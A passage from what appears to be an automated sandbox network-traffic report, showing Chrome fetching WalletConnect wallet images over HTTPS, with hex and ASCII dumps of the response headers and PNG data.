10 7c f5 3e 59 75 13 19 99 3f 86 a4 ff 97 b1 79 63 c8 28 76 bf 09 2a
                                                                          Data Ascii: (//mC/>#{]smHP9#:^tlGAf[ycI"Lpqn'hb>C:u}uFC&i{.T$9cD?OsNn-^F!b|mlo1t.2!/]n/:)#w:X,G#FK|>Yu?yc(v*
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: 91 64 f0 6b 7d 09 e2 3f 43 bd 40 a3 dd 8c 74 4f 20 e1 c1 df 32 d6 3d 92 0c 7f db 0b a0 8a 79 76 ed cd 67 e8 66 7f 69 4f 95 80 56 bb 8c 1f cd 2e c7 70 76 2f cd dd 9d 0f b9 dc 8c 84 77 3b cf d8 53 31 64 02 7d b7 80 f8 44 13 8d 35 48 64 64 d1 18 12 5e eb 1b c6 16 0f 27 53 18 ff 37 88 3f f0 d5 94 7d 3e 43 37 f9 49 7b a9 14 b4 d2 69 0e 68 7c 01 28 67 94 a6 7a df 84 9c 6a 49 c2 bb dd 64 ec a9 68 32 89 b6 d5 20 3e d3 42 43 b5 f7 33 d2 33 89 84 07 ef 65 6c fe 68 32 8d 0d 0f 81 78 b3 4b 3b f3 18 ba 95 a4 bf 56 01 5a e5 32 0f 34 38 0b 54 32 41 33 3d 33 21 29 b1 d2 ba 5f 66 ec 99 28 32 91 f6 b7 40 9c d6 51 23 8d 77 31 b2 68 22 09 0f f9 95 b1 15 c3 c9 54 d6 f9 09 c4 5f d4 d2 c6 7c 86 ae f3 93 f6 06 83 57 38 cc 05 f5 b8 01 2a 79 52 13 3d 33 20 67 5a 90 f0 6e 19 a0 63
                                                                          Data Ascii: dk}?C@tO 2=yvgfiOV.pv/w;S1d}D5Hdd^'S7?}>C7I{ih|(gzjIdh2 >BC33elh2xK;VZ248T2A3=3!)_f(2@Q#w1h"T_|W8*yR=3 gZnc
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: a0 3a bf 4a 3a df 89 04 d6 fe 55 d0 f9 16 64 49 f6 b8 21 a7 74 2e 89 ec 51 28 a6 6c 26 59 94 4f 97 89 d9 59 43 86 63 b1 98 ad 01 56 45 cd 9d 52 ce 75 21 a1 91 89 42 4e 77 20 cb b2 f3 39 19 65 4f 93 d8 d1 85 22 8a 67 93 85 39 a3 58 c4 17 81 72 9c 09 22 3e 75 59 19 ae 8d 12 52 3b 92 e0 f0 34 01 69 71 64 69 c6 9d c4 95 ce 25 d1 33 8b 61 85 b3 c9 e2 7c b8 00 f6 79 b0 ac 1a 3b 61 db 82 ad 0e fb 72 54 5a 67 12 fe 9f 8b a0 a4 36 64 79 36 4b c4 94 3c 41 e2 9f c1 94 cc 24 0b f4 81 4c c8 17 35 e4 d5 d8 03 f9 cc cf 0a a1 37 11 e7 da 93 06 ef cf 04 24 b7 22 4b b4 de 0f ea 4a e7 92 16 ed f3 d5 b9 67 92 45 7a cf 15 65 5f d4 d2 04 35 3b a8 6c 47 b0 55 42 cf 97 2b ba d0 89 34 3a ac 40 d1 b9 96 64 99 86 ec 54 53 3e 9b b4 6a 5b a7 a6 78 16 59 a8 6d fe 55 f2 69 4d cd 50 4c
                                                                          Data Ascii: :J:UdI!t.Q(l&YOYCcVERu!BNw 9eO"g9Xr">uYR;4iqdi%3a|y;arTZg6dy6K<A$L57$"KJgEze_5;lGUB+4:@dTS>j[xYmUiMPL
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: 5f 8c 97 0b cb 66 5b 8c 2e 1f 57 80 70 ac 8d b6 4b 48 0a 89 c2 1c 46 e3 b6 bb 8d f9 82 3a e3 67 e4 6c cf b0 00 fc 50 78 01 66 43 2a 94 01 c1 1f 71 75 4c a4 87 fd 37 cd ac e3 98 3e 4b d4 73 a9 37 ca 82 58 af 19 00 9e b4 a3 4a 21 22 96 ae bc 09 47 b8 3d 72 e9 1e dd 6c 51 98 84 5a 83 c2 0d c6 d8 82 80 25 9c 1c cd 71 56 86 c9 3f 29 21 69 71 ed 25 95 1f 63 2f 5b 17 58 10 bb 75 8d f6 be da d0 63 5d 42 10 d3 53 cf ef db fe a8 9f e9 fa 40 00 01 68 af 46 e7 a3 8d 87 21 a7 0b 47 7c 60 cb 77 21 5f b9 e4 af 9b f9 47 ac 22 49 00 ac a8 31 c9 4d c8 fb c6 64 3c 1a 1a e9 3c b2 79 ca f0 8f 4c 59 eb 31 68 13 35 68 6b 6d 8e 46 73 c4 71 da 2d b1 8d 01 2c 6a fb fe cd 74 cb db 30 a9 87 82 70 9f 6c a2 52 54 00 da 3f 2d 8c 85 d6 f4 f0 76 62 61 5e 59 7b e1 38 80 b3 15 6e 8c b6 cc
                                                                          Data Ascii: _f[.WpKHF:glPxfC*quL7>Ks7XJ!"G=rlQZ%qV?)!iq%c/[Xuc]BS@hF!G|`w!_G"I1Md<<yLY1h5hkmFsq-,jt0plRT?-vba^Y{8n
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: 2f ff 18 6b 56 2a e5 d5 84 d9 8b 23 fc 24 c5 a4 98 99 cd 5f f9 28 34 11 f7 f2 e5 76 63 da 0e 40 24 88 d4 e9 47 54 2c fd 7b d1 8e da 0f 32 df 11 95 3b 0c ac d8 91 7a 89 6c 3d d7 58 82 83 df ac 15 47 9f 1e 11 96 cf a9 e8 3c 3a 87 aa 60 22 75 b8 5a 17 e7 be 25 40 8f 64 b6 a5 49 7c b5 01 b4 cd c2 a4 eb 64 f0 b2 78 30 6b 16 b8 b3 8d fe 59 53 36 d0 5e 9c 89 20 85 a1 62 1e 2a 82 60 0c ef 55 15 19 bd 4c c2 56 00 7d bb 35 25 00 43 47 b2 97 e7 55 d5 e0 ff 90 14 76 a4 79 3b 0f 56 17 e4 57 b7 b9 3f da 07 10 b6 e9 13 3b 2f 14 ef dd 54 9e 3c c5 1f d1 54 6f ee 05 85 68 d1 b1 ec 4e 53 7c f4 dd 91 cb 6f c3 95 4d 38 23 c6 17 df 60 03 c9 6f 62 0b 55 60 60 cc 5c 25 f1 46 4d 9f 78 64 33 1b a4 b3 8d b5 f2 a4 c2 98 ed ad e1 88 ec 30 23 19 28 82 cd e7 49 0a dd 43 e0 bc 3e 13 ac
                                                                          Data Ascii: /kV*#$_(4vc@$GT,{2;zl=XG<:`"uZ%@dI|dx0kYS6^ b*`ULV}5%CGUvy;VW?;/T<TohNS|oM8#`obU``\%FMxd30#(IC>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          46192.168.2.549760104.18.27.464435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:25 UTC487OUTGET /w3m/v1/getWalletImage/7e1514ba-932d-415d-1bdb-bccb6c2cbc00?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1
                                                                          Host: explorer-api.walletconnect.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:25 UTC948INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 36 33 30 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 33 64 31 39 62 35 31 37 34 63 61 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:25 GMTContent-Type: image/pngContent-Length: 26307Connection: closeCF-Ray: 8336f3d19b5174ca-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: *Cache-Control: public, max-a
                                                                          2023-12-10 16:44:25 UTC421INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 90 00 00 01 90 08 03 00 00 00 b7 61 c6 fe 00 00 03 00 50 4c 54 45 00 25 6c 03 45 99 02 3d 8e 03 4d a4 00 26 6c 03 48 9e 03 44 97 02 3f 91 02 3b 8b 01 2f 79 04 4f a6 04 4c a3 04 4f a6 03 47 9c 03 45 99 02 3d 8e 01 34 80 01 31 7c 02 36 83 04 4b a2 02 3a 89 03 40 93 02 3b 8c 02 3f 90 04 4e a5 03 42 94 03 43 96 03 49 9e 04 4d a4 03 44 97 04 4a a0 03 4a 9f 04 4f a7 ff ff ff 01 25 6c 03 41 93 02 36 83 01 35 82 02 3a 89 03 40 91 01 30 7b 02 38 86 02 3d 8d 01 3c 8c 02 3b 8a 01 2e 78 03 44 97 03 43 96 03 42 94 01 32 7e 01 2c 75 01 31 7c 01 2f 79 01 37 85 03 3f 90 00 2b 74 03 40 92 01 3e 8f 01 33 7f 02 39 87 03 46 9a 02 3e 8e 01 39 88 02 37 84 00 25 6c 00 2d 77 01 2a 72 01 2d 76 01 34 80 03 45 99 00 29 71 03
                                                                          Data Ascii: PNGIHDRaPLTE%lE=M&lHD?;/yOLOGE=41|6K:@;?NBCIMDJJO%lA65:@0{8=<;.xDCB2~,u1|/y7?+t@>39F>97%l-w*r-v4E)q
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: a3 02 3f 91 01 33 7f 03 46 9b 03 41 94 04 4b a0 01 33 7e 01 3a 8a 03 3d 8d 00 27 6f 00 27 6d 03 3f 8f 00 2e 79 02 32 7d 01 2c 74 04 47 9b 01 31 7c 01 33 80 e4 e9 f2 02 3d 8c 04 4e a6 03 44 96 03 3c 8b 00 2a 72 03 3c 8c 02 36 82 5e 7c ac 89 a2 c6 b8 c7 dc b7 c5 da 2e 5b 9b 89 9f c2 04 4b a2 04 47 9c 03 3b 8a 5d 80 b2 03 3d 8c f9 fa fc 02 31 7d 00 2a 78 04 4f a7 2f 57 96 00 31 84 00 34 86 e9 ee f5 03 3b 8b f3 f6 fa 2e 54 91 00 26 73 00 37 88 00 2d 7c 00 30 81 00 38 8b 09 35 7d ee f2 f7 00 2c 7b 03 3d 8e 00 29 76 fc fd fe d2 dc ea 32 5e 9e 00 2e 80 fe fe ff 35 63 a3 c7 d4 e5 74 92 be 1c 50 97 00 28 74 40 6a a6 00 38 89 00 3a 8c c0 ce e1 9c b2 d1 e5 eb f3 0a 39 82 4e 75 ac a9 bc d7 55 7b b1 0c 3d 87 64 86 b6 95 ac cc 6c 8c ba 22 55 9b 0a 37 7f a2 b7 d4 04 45
                                                                          Data Ascii: ?3FAK3~:='o'm?.y2},tG1|3=ND<*r<6^|.[KG;]=1}*xO/W14;.T&s7-|085},{=)v2^.5ctP(t@j8:9NuU{=dl"U7E
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: b9 73 25 8c c5 8b 3d 1e 95 be f9 a8 14 96 c3 a9 1f 01 91 7e fd f8 38 44 e9 09 6b cb a1 6e 08 f5 50 4a 82 78 dc 77 df 7d da 93 25 74 63 e6 cc 99 01 90 59 12 88 ee 5f 2d 47 3c 6e b5 d8 0f de b9 0a 79 04 72 d7 5d 77 11 b6 7c 8c 2f a6 6e 18 40 a0 6e a4 7c 11 a1 87 b4 e5 8b 85 7a 08 73 9e 94 b1 87 ed bd 12 9f fd 22 01 41 3c fe 09 f1 a0 81 e0 f7 4a 02 79 80 04 32 cb 02 84 f6 af 22 bc 57 1c 0f 1a c8 18 12 88 67 c8 11 10 ed ad 32 81 78 1c 4c 20 b6 f7 2a 37 32 10 df fd c2 3c 58 20 3e 08 5e 43 3c 18 f0 c5 0a dc ab 20 1e 64 78 0c 79 38 e0 b1 60 88 ce e3 33 27 0f 56 3f 3c 20 9e f1 88 ca a3 77 ef 2e 81 c3 3b 4a f1 28 85 40 ba 89 e8 5c f9 ba 95 71 79 e4 86 3c 1c 40 08 fd 20 9f 2c 2d 34 7f fd 75 0d 08 ce 95 3c f1 84 91 2e 19 06 44 c3 21 05 fa ba 4a 3f 3e ff fc 73 95 2b
                                                                          Data Ascii: s%=~8DknPJxw}%tcY_-G<nyr]w|/n@n|zs"A<Jy2"Wg2xL *72<X >^C< dxy8`3'V?< w.;J(@\qy<@ ,-4u<.D!J?>s+
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: 5a 93 87 97 c5 12 46 1d f0 30 80 c8 dc 55 be 9d 47 a1 93 07 00 62 f2 a0 e3 73 0d c8 eb 1c 10 c4 e3 09 65 40 44 0a 0b 01 a1 df ab 40 35 3a 02 84 ed dc a5 9b 19 24 8f c8 40 0c 05 d1 73 57 18 08 e4 91 4b 3f 56 08 88 07 03 da 73 04 84 b2 e7 de ec c7 eb 32 79 25 7d 2b d5 5c 12 98 8f e0 c9 f2 8b 1f d2 e5 0d 61 28 1e 5e 7c fe 34 05 44 f7 76 1f d1 79 04 85 0f c0 c3 73 75 6d fa 71 cb 2d 4c fd 3c 34 20 d3 83 e0 c3 b7 1d d3 e7 01 1c 01 11 8f 47 68 3f f2 f3 83 c1 8f 25 88 87 99 2c d1 f3 bb 88 c7 a3 8f 7a 38 7a f5 4a d0 c1 39 ec 13 65 e3 c1 d7 6d 8f 15 6a 64 90 c5 8f 59 90 07 f4 af 16 04 b3 38 76 20 ee 62 2d 1e 36 70 e7 76 21 8f a0 b7 bd b4 b4 d4 cb b8 c3 f0 03 a5 76 17 0b 93 0e 73 ed 6f 71 3c 0a cd f0 03 bf 57 8f fa d2 0b 02 c1 8f 15 19 9f 47 88 07 89 ce 5d cd d9 35
                                                                          Data Ascii: ZF0UGbse@D@5:$@sWK?Vs2y%}+\a(^|4Dvysumq-L<4 Gh?%,z8zJ9emjdY8v b-6pv!vsoq<WG]5
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: 11 90 cf e5 be 0c 12 c8 4b d7 1a 08 51 fc 98 3b 77 6e 25 07 24 2a 8f 98 0a a2 01 21 73 89 8c 31 37 37 33 18 b9 44 7f e7 d2 2c 32 9b 48 37 8b de 8e 9b 77 6d fe 15 ca ec e2 55 00 4c 7a d7 cf f0 ca 41 35 b4 48 c6 a8 7d 04 40 50 be 3d 7f 89 8d 87 91 6f 27 8a b5 86 73 45 03 89 c7 03 25 13 89 5a d4 fd a2 e5 c7 dd 4c 4d 4c 9e e3 f8 dc 34 e7 26 8f 28 cb 4b 44 ca 1d 2f 22 e3 7a 19 e6 22 dd 20 86 6b d9 f0 83 4e 97 c0 d4 2e e2 61 00 a1 8b 1f 74 f4 81 93 ed 74 b1 d6 02 c4 a1 1f d1 80 dc 68 01 c2 74 27 8a 94 3b a7 20 b8 58 8b 27 d5 24 90 15 21 8f 72 27 0f a3 58 8b 80 8c e4 80 90 fa 81 16 21 f3 8b 19 28 1e b3 3c 1e cb c3 f0 63 39 04 a2 f1 b8 1d d7 6a 85 bb ab bf 58 f0 c1 ba 03 35 ef fa e6 83 d5 8f 10 49 6f 7f f3 55 18 12 7a c1 60 29 e4 b1 21 25 f4 23 b5 01 b8 bb dd 74
                                                                          Data Ascii: KQ;wn%$*!s1773D,2H7wmULzA5H}@P=o'sE%ZLML4&(KD/"z" kN.attht'; X'$!r'X!(<c9jX5IoUz`)!%#t
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: 60 55 9f 5e 3b c7 e9 44 e3 bd 82 d6 c3 b2 c9 32 6e b2 5d 87 31 7c f8 b8 71 0c 10 ba 99 1a f0 d0 81 50 3c fc 61 9c 5b 39 20 51 79 58 3b 77 43 20 44 ae 84 e4 01 80 e8 3c a8 e6 12 36 fe b8 a6 3c 00 10 3a 00 81 40 ee 47 40 4c 1e a0 79 97 e2 41 d5 3f 62 16 3f 88 58 90 4c 26 d2 40 72 38 20 74 fd 03 f2 a0 81 d0 cd 25 d1 93 ed 3a 0f 09 c4 d5 7c 25 80 78 20 00 10 6b ed c3 b6 79 17 d8 0e bd 7d f7 06 03 88 ad 19 4e 9f 1c bc 85 e4 11 2e d2 47 c3 ce 1b 38 73 ae f4 23 0b 0a b2 1e c1 89 09 5b f3 15 4e 26 ba f5 a3 18 00 71 f4 5e 05 a2 9d 1d 84 7b 13 3b ce e3 11 76 d1 ab 5a 14 ae f3 60 36 21 b3 cb 4b 02 1e 82 48 d4 e1 da f8 57 58 2c 3c a2 f8 57 1e 8f e2 62 16 08 d1 cc 10 2a 08 00 c2 9c b9 e3 fc 2b 92 c7 23 ec 26 64 09 e4 46 0b 90 5b 48 20 bd 39 20 39 64 3c 68 f2 c0 40 b0
                                                                          Data Ascii: `U^;D2n]1|qP<a[9 QyX;wC D<6<:@G@LyA?b?XL&@r8 t%:|%x ky}N.G8s#[N&q^{;vZ`6!KHWX,<Wb*+#&dF[H 9 9d<h@
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: 9e ac 85 3c f4 78 90 6e 4e 0c 34 e4 fb 43 cb 76 6e df da d6 d0 5e da 9a 0c 81 b8 15 24 00 f2 16 d7 4c cd 26 db 8b 48 7f 37 92 82 74 06 0a 32 dc e4 21 81 68 cd 0c 4c 6f a2 ee 5f 0d 19 f2 b0 58 cd b0 60 01 5f fb a0 f5 03 f5 52 07 cb e1 1c c9 76 53 3f fc 76 b8 51 d9 d9 a3 5a 5b db ab 77 1e 38 7e e4 74 75 55 f6 89 75 29 c8 83 b4 1d 95 95 9c f9 e0 6a 1f 6c f3 15 9d db b5 35 8b 2a 0b e2 a7 af 84 e4 f5 0d c4 63 92 88 c8 c3 a8 0d 2e 0f 81 d0 b1 47 e4 f7 4a 94 a3 22 14 3f d0 7b 25 22 90 ec ec de d9 5f ec db ba a5 66 e3 c9 8b a7 9b c7 d4 9d 48 e5 38 78 84 f9 f6 ab c0 23 6e 33 1c 74 b1 44 fa 0a 01 e9 4b 00 61 9b a9 35 7f 37 06 10 db 7b 75 17 09 04 27 13 89 45 4b b3 83 6d 00 a3 52 a9 2e df ef 3b 74 f0 40 5a da c6 03 fb 77 5d 58 b7 2e 95 ca a1 78 68 40 96 90 40 68 67
                                                                          Data Ascii: <xnN4Cvn^$L&H7t2!hLo_X`_RvS?vQZ[w8~tuUu)jl5*c.GJ"?{%"_fH8x#n3tDKa57{u'EKmR.;t@Zw]X.xh@@hg
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: 89 ba 56 2d f8 08 c3 0f 19 7b 44 18 74 46 c9 44 74 b3 96 02 82 7c dd c0 6a c0 e6 5d 69 cb 45 e8 01 94 43 e0 90 40 ec 3c d4 56 ea 08 9b af 5c cd 70 51 cf 78 11 cb 4b 24 8f 54 aa cb 17 4d cd cb b6 ac df b8 19 03 59 7b e0 d5 65 6d ed f5 27 5a 19 1e 6f 99 fa 41 17 3f 88 66 6a 87 0d c1 c1 87 d0 0f 99 6b cf 33 81 f4 a0 81 dc 4f 01 01 ef 15 58 db ee ea 66 70 07 20 ee 33 db 4c bd 16 28 48 aa 35 f9 55 53 e3 ee fd 67 0c 1c 5e 02 e5 c0 91 bd 55 df ae 4b 26 93 06 0f 8f 88 7c b0 48 df ca da 4c ed 00 42 f3 80 d9 2b ef 47 e8 5c 79 3c a0 77 d5 a3 02 00 31 cf 1a b0 57 20 ad 38 62 2f 66 10 8b c8 74 e7 ca 8c 07 75 ff 6a fa bc d2 d4 ba d6 ef 1b ab 97 5d c4 16 3d d0 91 e3 9e 5d 3f 97 6c 4d 72 bd 3e 2b 56 ac 40 5b db 89 5a 54 3f ae 57 d4 1b ae ed d5 ab 97 68 86 63 73 25 b2 58
                                                                          Data Ascii: V-{DtFDt|j]iEC@<V\pQxK$TMY{em'ZoA?fjk3OXfp 3L(H5USg^UK&|HLB+G\y<w1W 8b/ftuj]=]?lMr>+V@[ZT?Whcs%X
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: c5 e0 00 f6 43 9e e3 0c 76 8b 82 39 e7 d6 96 6e ed 8d bb 0e 6e e1 93 26 48 76 ec ac 6e fa 76 49 56 6e 6e 6c 7f 37 7e 32 71 5c e0 f0 5a d2 25 74 ae 44 ea 46 57 5f 12 68 13 80 2d 9f 68 6d 86 b3 0c 7f c4 2a d6 22 20 a5 8a 47 4e eb ba 6f f7 ed 3a ba f3 40 04 17 2b 50 92 6d 5b 9b 9b be ca aa 6f 31 33 89 16 7f 37 82 7f 45 25 af 42 20 78 19 80 c9 43 03 72 b3 09 04 a6 13 59 05 a1 bb 45 35 1e 2f e9 3c 5c c3 1f 6e 1e 9e bf ab 03 f9 aa 71 eb fe 2d 6b 22 99 10 5f 0e 6c df db dc de 52 5b 17 81 87 d5 df ed 6f e1 d1 19 26 af c6 75 9c 47 08 44 ed d1 a7 03 0f d3 9c b3 bd 57 da 65 9c 0e 0d 1b 20 f5 18 05 a6 ce 53 dd 72 32 bb b5 b7 1d dc b2 63 6d 74 20 3b b6 6c df 5d 55 ff 51 9d e3 bd a2 9d 2b d6 bf 12 1c e4 17 69 3e 54 ae 24 52 2d ea 66 24 18 08 13 09 a2 f4 15 04 82 df 2b
                                                                          Data Ascii: Cv9nn&HvnvIVnnl7~2q\Z%tDFW_h-hm*" GNo:@+Pm[o137E%B xCrYE5/<\nq-k"_lR[o&uGDWe Sr2cmt ;l]UQ+i>T$R-f$+


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          47192.168.2.549762104.18.27.464435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:25 UTC487OUTGET /w3m/v1/getWalletImage/73f6f52f-7862-49e7-bb85-ba93ab72cc00?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1
                                                                          Host: explorer-api.walletconnect.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:25 UTC999INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 38 30 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 33 64 31 38 61 39 66 62 33 64 34 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 67 65 3a 20 36 36 38 33 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:25 GMTContent-Type: image/pngContent-Length: 2802Connection: closeCF-Ray: 8336f3d18a9fb3d4-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: *Age: 6683Cache-Control: pub
                                                                          2023-12-10 16:44:25 UTC370INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 90 00 00 01 90 08 03 00 00 00 b7 61 c6 fe 00 00 00 b1 50 4c 54 45 24 61 ed ff ff ff 20 5e ed 21 5f ed fd fd ff 68 92 f3 fb fc ff 54 83 f1 1e 5d ed 23 60 ed 1d 5c ec 22 60 ed 2c 67 ee 1b 5b ec d8 e3 fc 31 6b ee 37 6f ef 26 62 ed f7 fa ff e7 ee fd f0 f4 fe 3c 72 ef 90 af f6 ec f1 fe 97 b4 f7 50 81 f1 28 64 ed c2 d3 fa e3 eb fd 1e 5c ed ce dc fb a6 bf f8 44 78 f0 8a aa f6 b2 c7 f9 4d 7e f0 bc cf fa 40 75 ef 79 9e f4 61 8d f2 7f a2 f5 fe fe ff 75 9b f4 ac c3 f8 48 7b f0 5b 89 f2 c7 d7 fb de e7 fd b7 cb f9 f3 f7 fe d4 e0 fc 6b 94 f3 9e b9 f7 58 87 f2 6f 97 f4 64 90 f2 84 a6 f5 55 84 f1 67 91 f3 ac dd b2 bf 00 00 09 fc 49 44 41 54 78 9c ed dd 87 76 e2 ba 16 80 61 8e 44 18 c9 18 6c 7a 9d 84 12 6a 20 21 85
                                                                          Data Ascii: PNGIHDRaPLTE$a ^!_hT]#`\"`,g[1k7o&b<rP(d\DxM~@uyauH{[kXodUgIDATxvaDlzj !
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: ba 14 3c 8e 6a 85 42 7e 91 cf 9a 42 f5 b2 39 ee 2a db 11 34 ab 58 59 de fe 93 61 f5 ab 89 b0 1d 43 93 44 70 b5 b0 1d d3 13 95 5f 84 3b 53 89 08 7b b6 e3 79 ba c2 34 e7 4c 8b 54 46 b6 a3 69 42 f5 d1 b3 1d 48 43 4a 4d db b1 34 a3 3f 76 63 1e f1 56 35 db a1 34 64 e4 c4 a0 a5 65 db 76 20 4d 29 bc 49 db d1 34 40 34 ca b6 03 69 cc c6 85 59 c4 5b db 0e a3 39 fd 86 03 5d 44 0e 6d 87 d1 9c fa cc 85 2e 72 65 3b 8c 06 bd 96 6c 47 f3 74 95 6b db 51 34 a8 e9 42 83 6c 6c 47 d1 a0 a1 03 0d c2 90 95 32 72 6e 3b 8a e6 dc bf 38 30 a9 ab b7 bc ed 38 1a d3 0f 5d 58 f6 06 99 3e 09 79 67 e4 c4 66 56 c9 99 31 2b 3f 76 a0 83 ec 4e 43 1e 6c 47 d2 90 2b 27 36 17 73 39 ef e5 de 76 28 8d b8 5b 39 31 62 ed fa c8 dc 89 79 dd 89 24 e4 87 a2 9c 3a d0 47 6e 7d 27 66 90 1f b4 7c cc fc 1e
                                                                          Data Ascii: <jB~B9*4XYaCDp_;S{y4LTFiBHCJM4?vcV54dev M)I4@4iY[9]Dm.re;lGtkQ4BllG2rn;808]X>ygfV1+?vNClG+'6s9v([91by$:Gn}'f|
                                                                          2023-12-10 16:44:25 UTC1063INData Raw: 41 d2 3f f5 91 b8 fb ab b1 60 2a 31 c6 8b bc e2 fd 5b fd 69 c2 82 cb 10 ef 9b 91 e7 4a fa f3 86 c7 54 62 80 08 4c 3d 90 fc f0 98 e3 dc fd 64 5a b6 0d b5 c7 ee b0 64 9b 63 c1 75 22 ef 98 14 fd 43 f7 57 03 0a 86 4e 22 27 86 1f ea ab b5 43 a6 92 e3 15 2b 57 66 db e3 c7 ce bc af c8 dd 8f a4 9e e3 78 cc fd f6 a5 c2 63 00 47 11 a6 07 ac 5f aa 37 5b 12 c5 63 48 f3 03 d6 2f f5 66 40 93 44 a6 9e 63 fc 07 71 ed 35 a0 aa 2e 1a 35 88 f7 5f 5f bd 47 6e 75 46 21 8f 3f 04 39 50 7e 34 60 dc 3a 9c b7 8c b9 3d 76 89 e2 d3 84 6b 0c 07 92 83 44 7e aa 5a 9e 87 ec 02 1f 42 57 46 49 b4 c7 ae 5e 68 ad a9 06 fe 5a e9 94 53 db 68 aa d7 1d 49 2f f9 82 88 79 85 f5 5e ab 39 f8 4e 27 f9 8c 2e c6 96 12 ee 77 b7 ec 32 6e 7d 22 d6 94 70 af c5 ed ac 42 e9 e9 47 54 4c 7b 58 9f 2a dc 74 28
                                                                          Data Ascii: A?`*1[iJTbL=dZdcu"CWN"'C+WfxcG_7[cH/f@Dcq5.5__GnuF!?9P~4`:=vkD~ZBWFI^hZShI/y^9N'.w2n}"pBGTL{X*t(


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          48192.168.2.549764104.18.27.464435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:25 UTC487OUTGET /w3m/v1/getWalletImage/9f259366-0bcd-4817-0af9-f78773e41900?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1
                                                                          Host: explorer-api.walletconnect.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
